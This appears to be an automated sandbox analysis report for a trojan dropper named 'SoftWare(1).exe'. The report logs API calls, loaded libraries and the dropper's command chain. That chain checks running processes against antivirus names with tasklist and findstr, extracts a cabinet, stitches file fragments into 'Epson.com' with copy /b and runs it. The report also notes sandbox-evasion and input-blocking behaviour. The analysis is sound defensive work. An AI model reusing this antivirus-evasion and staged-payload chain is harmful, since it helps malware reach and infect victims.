      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F6C62412_2_00F6C624
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FDC8A412_2_00FDC8A4
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F8E87F12_2_00F8E87F
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F86ADE12_2_00F86ADE
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC2A0512_2_00FC2A05
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB8BFF12_2_00FB8BFF
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F6CD7A12_2_00F6CD7A
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F7CE1012_2_00F7CE10
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F8715912_2_00F87159
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F5924012_2_00F59240
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FE531112_2_00FE5311
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F596E012_2_00F596E0
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F7170412_2_00F71704
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F71A7612_2_00F71A76
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F77B8B12_2_00F77B8B
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F59B6012_2_00F59B60
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F77DBA12_2_00F77DBA
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F71D2012_2_00F71D20
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F71FE712_2_00F71FE7
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\250478\Epson.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 004062CF appears 58 times
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: String function: 00F6FD52 appears 40 times
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: String function: 00F70DA0 appears 46 times
      Source: SoftWare(1).exeStatic PE information: invalid certificate
      Source: SoftWare(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@24/22@12/2
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC41FA GetLastError,FormatMessageW,12_2_00FC41FA
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00FB2010
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB1A0B AdjustTokenPrivileges,CloseHandle,12_2_00FB1A0B
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00FBDD87
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00FC3A0E
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Users\user\AppData\Local\Temp\nsfF553.tmpJump to behavior
      Source: SoftWare(1).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SoftWare(1).exeReversingLabs: Detection: 23%
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile read: C:\Users\user\Desktop\SoftWare(1).exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Representation Representation.cmd & Representation.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 250478
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Katrina
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "JIM" Accepting
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Marco + ..\Dodge + ..\Loops + ..\Conclude + ..\Hydraulic + ..\Concern m
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\250478\Epson.com Epson.com m
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Representation Representation.cmd & Representation.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 250478Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E KatrinaJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "JIM" Accepting Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Marco + ..\Dodge + ..\Loops + ..\Conclude + ..\Hydraulic + ..\Concern mJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\250478\Epson.com Epson.com mJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: SoftWare(1).exeStatic file information: File size 1229340 > 1048576
      Source: SoftWare(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: SoftWare(1).exeStatic PE information: real checksum: 0x1329c9 should be: 0x131d9f
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F70DE6 push ecx; ret 12_2_00F70DF9

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\250478\Epson.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\250478\Epson.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FE26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_00FE26DD
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F6FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00F6FC7C
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-104851
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comAPI coverage: 3.7 %
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.com TID: 7996Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00FBDC54
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00FCA087
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00FCA1E2
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00FBE472
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00FCA570
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC66DC FindFirstFileW,FindNextFileW,FindClose,12_2_00FC66DC
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F8C622 FindFirstFileExW,12_2_00F8C622
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00FC73D4
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC7333 FindFirstFileW,FindClose,12_2_00FC7333
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00FBD921
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F55FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00F55FC8
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\250478\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\250478Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: Epson.com, 0000000C.00000002.2467784156.0000000001506000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCF4FF BlockInput,12_2_00FCF4FF
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F5338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00F5338B
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
